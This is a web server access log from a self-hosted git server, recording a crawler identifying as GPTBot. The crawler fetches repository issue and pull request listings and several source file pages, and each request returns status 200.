"/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:19:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:19:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:19:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec?display=source" [Client 74.7.227.38] [Length 13264] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:19:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt?display=source" [Client 74.7.227.38] [Length 11273] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:19:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md?display=rendered" [Client 74.7.227.38] [Length 13121] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:19:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:19:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md?display=source" [Client 74.7.227.38] [Length 15843] [Gzip 4.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:19:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat?display=source" [Client 74.7.227.38] [Length 13397] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:19:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:19:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10091] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10264] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" -[17/Feb/2026:19:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11029] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:19:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache?display=source" [Client 74.7.227.38] [Length 11157] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:19:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[17/Feb/2026:19:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt?display=rendered" [Client 74.7.227.38] [Length 11033] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11038] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:19:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr 